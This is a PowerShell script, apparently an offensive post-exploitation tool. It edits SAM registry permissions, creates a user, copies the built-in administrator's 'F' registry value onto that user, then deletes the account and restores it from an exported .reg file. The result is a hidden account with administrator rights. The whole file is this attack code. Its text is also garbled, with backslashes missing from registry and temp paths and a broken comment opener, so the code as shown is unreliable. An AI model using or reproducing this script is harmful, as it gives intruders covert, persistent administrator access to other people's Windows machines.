function Create-Clone
{
< #
.SYNOPSIS
This script requires Administrator privileges. use Invoke-
TokenManipulation.ps1 to get system privileges and create the clone user.
.PARAMETER u
The clone username
.PARAMETER p
The clone user's password
.PARAMETER cu
The user to clone, default administrator
.EXAMPLE
Create-Clone -u evi1cg -p evi1cg123 -cu administrator
#>
Param(
[Parameter(Mandatory=$true)]
[String]
$u,
[Parameter(Mandatory=$true)]
[String]
$p,
[Parameter(Mandatory=$false)]
[String]
$cu = "administrator"
)
function upReg{
"HKEY_LOCAL_MACHINESAM [1 17]" | Out-File $env:tempup.ini
"HKEY_LOCAL_MACHINESAMSAM [1 17]"| Out-File -Append $env:tempup.ini
"HKEY_LOCAL_MACHINESAMSAMDomains [1 17]" | Out-File -Append $env:tempup.ini
"HKEY_LOCAL_MACHINESAMSAMDomainsAccount [1 17] "| Out-File -Append $env:tempup.ini
"HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [1 17] "| Out-File -Append $env:tempup.ini
"HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [1 17]"| Out-File -Append $env:tempup.ini
cmd /c "regini $env:tempup.ini"
Remove-Item $env:tempup.ini
}
function downreg {
"HKEY_LOCAL_MACHINESAM [1 17]" | Out-File $env:tempdown.ini
"HKEY_LOCAL_MACHINESAMSAM [17]"| Out-File -Append $env:tempdown.ini
"HKEY_LOCAL_MACHINESAMSAMDomains [17]" | Out-File -Append $env:tempdown.ini
"HKEY_LOCAL_MACHINESAMSAMDomainsAccount [17] "| Out-File -Append $env:tempdown.ini
"HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [17] "| Out-File -Append $env:tempdown.ini
"HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [17]"| Out-File -Append $env:tempdown.ini
cmd /c "regini $env:tempdown.ini"
Remove-Item $env:tempdown.ini
}
function Create-user ([string]$Username,[string]$Password) {
$group = "Administrators"
$existing = Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$Username"
if (!$existing) {
Write-Host "[*] Creating new local user $Username with password $Password"
& NET USER $Username $Password /add /y /expires:never | Out-Null
Write-Host "[*] Adding local user $Username to $group."
& NET LOCALGROUP $group $Username /add | Out-Null
}
else {
Write-Host "[*] Adding existing user $Username to $group."
& NET LOCALGROUP $group $Username /add | Out-Null
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
$exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
Write-Host "[*] Setting password for existing local user $Username"
$exist.SetPassword($Password)
}
Write-Host "[*] Ensuring password for $Username never expires."
& WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE | Out-Null
}
function GetUser-Key([string]$user)
{
cmd /c " echo HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames$user [1 17] >> $env:temp$user.ini"
cmd /c "regini $env:temp$user.ini"
Remove-Item $env:temp$user.ini
if(Test-Path -Path "HKLM:SAMSAMDomainsAccountUsersNames$user"){
cmd /c "regedit /e $env:temp$user.reg "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames$user""
$file = Get-Content "$env:temp$user.reg" | Out-String
$pattern="@=hex((.*?)):"
$file -match $pattern |Out-Null
$key = "00000"+$matches[1]
Write-Host "[!]"$key
return $key
}else {
Write-Host "[-] SomeThing Wrong !"
}
}
function Clone ([string]$ukey,[string]$cukey) {
"HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$ukey [1 17] "| Out-File $env:tempf.ini
"HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$cukey [1 17] " | Out-File $env:tempf.ini
cmd /c " regini $env:tempf.ini"
Remove-Item $env:tempf.ini
$ureg = "HKLM:SAMSAMDomainsAccountUsers$ukey" |Out-String
$cureg = "HKLM:SAMSAMDomainsAccountUsers$cukey" |Out-String
Write-Host "[*] Get clone user'F value"
$cuFreg = Get-Item -Path $cureg.Trim()
$cuFvalue = $cuFreg.GetValue('F')
Write-Host "[*] Change user'F value"
Set-ItemProperty -path $ureg.Trim() -Name "F" -value $cuFvalue
$outreg = "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$ukey"
cmd /c "regedit /e $env:tempout.reg $outreg.Trim()"
}
function Main () {
if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Output "Script must be run as administrator"
break
}
Write-Output "[*] Start"
Write-Output "[*] Tring to change reg privilege !"
upReg
if( !(Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$cu")){
Write-Host "[-] The User to Clone does not exist !"
Write-Output "[*] Change reg privilege back !"
downReg
Write-Output "[*] Exiting !"
}
else {
if(!(Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$u")){
$tmp = "1"
}
else{
$tmp = "0"
}
Write-Output "[*] Create User..."
Create-user $u $p
Write-Output "[*] Get User $u's Key .."
$ukey = GetUser-Key $u |Out-String
Write-Output "[*] Get User $cu's Key .."
$cukey = GetUser-Key $cu |Out-String
Write-Output "[*] Clone User.."
Clone $ukey $cukey
if($tmp -eq 1 ){
Write-Output "[*] Delete User.."
cmd /c "net User $u /del " |Out-Null
}else{ Write-Output "[*] Don't need to delete.."}
cmd /c "regedit /s $env:temp$u.reg"
cmd /c "regedit /s $env:tempout.reg"
Remove-Item $env:temp*.reg
Write-Output "[*] Change reg privilege back !"
downreg
Write-Output "[*] Done"
}
}
Main
}